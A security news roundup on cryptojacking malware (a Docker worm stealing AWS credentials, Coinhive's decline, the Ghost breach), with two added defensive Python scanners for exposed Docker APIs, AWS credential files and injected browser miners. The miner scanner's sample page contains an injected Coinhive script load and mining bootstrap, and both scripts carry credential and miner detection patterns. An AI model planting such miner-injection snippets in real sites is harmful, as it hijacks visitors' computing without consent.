Security News

A malicious cryptocurrency miner and DDoS worm that has been targeting Docker systems for months now also steals Amazon Web Services credentials. The worm still scans for open Docker APIs, then spins up Docker images and installs itself in a new container, but it now also searches for exploitable Kubernetes systems and for files containing AWS credentials and configuration details, in case the compromised system runs on AWS.

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial-of-service attacks, Palo Alto Networks reports. The malware enables the debug privilege for its own process and begins operation by launching several threads.

With Docker gaining popularity as a way to package and deploy software applications, malicious actors are taking advantage of the opportunity to target exposed API endpoints and craft malicious images that facilitate distributed denial-of-service attacks and mine cryptocurrency. According to a report published by Palo Alto Networks' Unit 42 threat intelligence team, the purpose of these Docker images is to generate funds by deploying a cryptocurrency miner in Docker containers, with the Docker Hub repository used to distribute the images.
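The two items above describe what this malware hunts for on a host: a Docker API reachable over plain TCP and AWS credential files lying around on disk. The script below is an added defensive example (it is not code from the worm, from Unit 42 or from the original items) that audits a host for exactly those two things. The dockerd configuration and the small filesystem it scans are constructed inline for a dry run; the access key and secret it plants are the placeholder values from the AWS documentation, not real credentials.

```python
"""Audit a host for what the Docker worm above hunts for: a Docker API listening
on plain TCP, and AWS credential material on disk.  Added defensive example,
not code from the worm or from the Unit 42 report."""
import json
import re
import tempfile
from pathlib import Path
from typing import List

# Standard AWS CLI/SDK credential file names (kept under a ".aws" directory),
# the documented access-key-id shape, and the secret-key setting name.
AWS_CRED_FILES = {"credentials", "config"}
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
AWS_SECRET_RE = re.compile(r"aws_secret_access_key\s*=\s*\S+", re.IGNORECASE)


def docker_api_findings(daemon_json: str, dockerd_argv: List[str]) -> List[str]:
    """Report dockerd listeners reachable over TCP.

    daemon_json  - text of /etc/docker/daemon.json ("" if the file is absent)
    dockerd_argv - argv of the running dockerd, e.g. taken from `ps`
    The Docker API is root-equivalent, so a TCP listener without --tlsverify
    (client-certificate authentication) is what the worm's scanner looks for.
    """
    hosts: List[str] = []
    tlsverify = False
    if daemon_json.strip():
        cfg = json.loads(daemon_json)
        hosts.extend(cfg.get("hosts", []))
        tlsverify = bool(cfg.get("tlsverify", False))
    for i, arg in enumerate(dockerd_argv):
        if arg in ("-H", "--host") and i + 1 < len(dockerd_argv):
            hosts.append(dockerd_argv[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
    findings = []
    for host in hosts:
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are local only
        addr = host[len("tcp://"):]
        wide_open = addr.startswith(("0.0.0.0", "[::]", ":"))
        scope = "all interfaces" if wide_open else addr
        if tlsverify:
            findings.append(f"{host}: TCP listener on {scope} with client-cert auth (OK if the CA is private)")
        else:
            findings.append(f"{host}: UNAUTHENTICATED Docker API on {scope}; remote root on this host")
    return findings


def aws_credential_findings(root: Path) -> List[str]:
    """Return files under root that look like AWS credential material
    (paths relative to root, POSIX form), mimicking the worm's file search."""
    hits = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        cred_file = path.parent.name == ".aws" and path.name in AWS_CRED_FILES
        if cred_file or AWS_KEY_RE.search(text) or AWS_SECRET_RE.search(text):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def build_sample_tree() -> Path:
    """Constructed sample filesystem (not real data): one credentials file, one
    .env leaking a key, one harmless file.  Key values are the AWS documentation
    placeholders."""
    root = Path(tempfile.mkdtemp(prefix="awsaudit-"))
    (root / ".aws").mkdir()
    (root / ".aws" / "credentials").write_text(
        "[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
        "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
    (root / "app").mkdir()
    (root / "app" / ".env").write_text("AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nDEBUG=1\n")
    (root / "app" / "README").write_text("nothing secret here\n")
    return root


if __name__ == "__main__":
    # Constructed dockerd configuration: API exposed on every interface, no TLS.
    exposed = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
    for finding in docker_api_findings(exposed, ["dockerd"]):
        print(finding)
    for finding in aws_credential_findings(build_sample_tree()):
        print("credential material:", finding)
```

On a real host, feed the function the contents of /etc/docker/daemon.json and the argv of the running dockerd, and point the credential scan at home directories and application deployment trees; a TCP listener that is not also protected by a firewall or TLS client authentication is what the worm's scanner is looking for.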

BlackBerry announced on Wednesday that the latest release of its Optics endpoint security product now includes a feature designed to protect Intel-based PCs against cryptomining malware. As a result of the collaboration between the two companies, version 2.5.1100 of BlackBerry's Optics product uses a Context Analysis Engine that leverages CPU data from Intel's Threat Detection Technology to detect and block cryptojacking attempts.

BlackBerry has added a new feature to its endpoint detection and response platform Optics: An Intel-powered cryptojacking malware detection system. BlackBerry claims its cryptojacking EDR has "Virtually no processor impact" on Windows 10 systems that Optics runs on, allowing "Organizations [to] detect and mitigate cryptojacking with greater precision and consistent results across all types of workloads."

Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploitation of critical vulnerabilities in SaltStack, which Ghost uses in its server management infrastructure.

Cryptojacking may not be entirely dead following the shutdown of a notorious cryptomining service, but it isn't very healthy, according to a paper released this week. Coinhive provided Monero cryptomining scripts for use on websites, retaining 30% of the funds for itself.

Since Coinhive's closure last year, cryptojacking has been almost eliminated, according to a group of researchers from the University of Cincinnati in the US and Lakehead University in Canada, because online ads generate more revenue. Though Coinhive's code was marketed as a monetization alternative to advertising, it was quickly abused: a mining script can also be injected into a website by hackers without the site owner's knowledge.
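The injection the researchers describe is a script tag the site owner never added. The scanner below is an added example (not code from the paper, from Coinhive or from the original item) that collects every script on a page and flags loads from Coinhive's own hosts, inline bootstraps that use the CoinHive object the library exposed, and any third-party script outside the site's allowlist. The page it scans is constructed inline; the site key in it is a placeholder, and the allowlist host is an assumption for the example.

```python
"""Scan a page's HTML for an injected browser miner of the Coinhive kind.
Added defensive example; not code from the paper or from Coinhive."""
import re
from html.parser import HTMLParser
from typing import List, Optional, Set, Tuple
from urllib.parse import urlparse

# coinhive.com served the miner library and authedmine.com was the service's
# opt-in variant.  The inline markers are the CoinHive JavaScript object the
# library exposed plus generic miner strings (CryptoNight hash, stratum pool
# protocol); they are heuristics, not an exhaustive signature set.
MINER_HOST_RE = re.compile(r"(^|\.)(coinhive\.com|authedmine\.com)$")
INLINE_MINER_RE = re.compile(r"CoinHive\.(Anonymous|User)|cryptonight|stratum\+tcp", re.IGNORECASE)


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src, inline_body)."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[Optional[str], str]] = []
        self._src: Optional[str] = None
        self._buf: Optional[List[str]] = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:  # inside a <script>; HTMLParser hands us raw text
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._src, self._buf = None, None


def audit_scripts(html: str, allowed_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Return (finding, evidence) pairs.  allowed_hosts is the site's own
    script allowlist; anything outside it is reported whether or not it is a
    known miner, because an injected script is one the owner never added.
    Relative script paths (same origin) are not reported."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src, body in parser.scripts:
        if src:
            host = (urlparse(src).hostname or "").lower()
            if MINER_HOST_RE.search(host):
                findings.append(("known-miner-host", src))
            elif host and host not in allowed_hosts:
                findings.append(("unlisted-third-party", src))
        elif INLINE_MINER_RE.search(body):
            findings.append(("inline-miner-bootstrap", body.strip().splitlines()[0]))
    return findings


# Constructed page: the site's own bundle, then an injected Coinhive load and
# bootstrap, then an ad-network script the owner did not allowlist.  The site
# key is a placeholder, not a real Coinhive key.
INJECTED_PAGE = """<html><head>
<script src="https://www.example.org/static/app.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});
miner.start();
</script>
<script src="//cdn.example-ads.net/ads.js"></script>
</head><body><p>Site content.</p></body></html>"""

CLEAN_PAGE = """<html><head><script src="/static/app.js"></script>
<script>window.addEventListener('load', function () {});</script></head><body></body></html>"""

ALLOWED = {"www.example.org"}  # assumed allowlist for the constructed site

if __name__ == "__main__":
    for kind, evidence in audit_scripts(INJECTED_PAGE, ALLOWED):
        print(f"{kind:24} {evidence}")
    print("clean page findings:", audit_scripts(CLEAN_PAGE, ALLOWED))
```

Run against a page fetched from your own site rather than a copy from the repository, since the injection lives in what is served, not in what was deployed; the allowlist check is what catches the next service that replaces Coinhive, since hostname signatures age quickly.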

Nearly 16,000 malware-infected MikroTik routers have been scrubbed of Coinhive cryptojacking code thanks to an international police operation. The international law enforcement agency Interpol says it launched Operation Goldfish Alpha in June 2019 to target 20,000 hacked routers in Southeast Asia that were being used to mine cryptocurrency, as well as to raise awareness in the region of the threat posed by cryptojacking.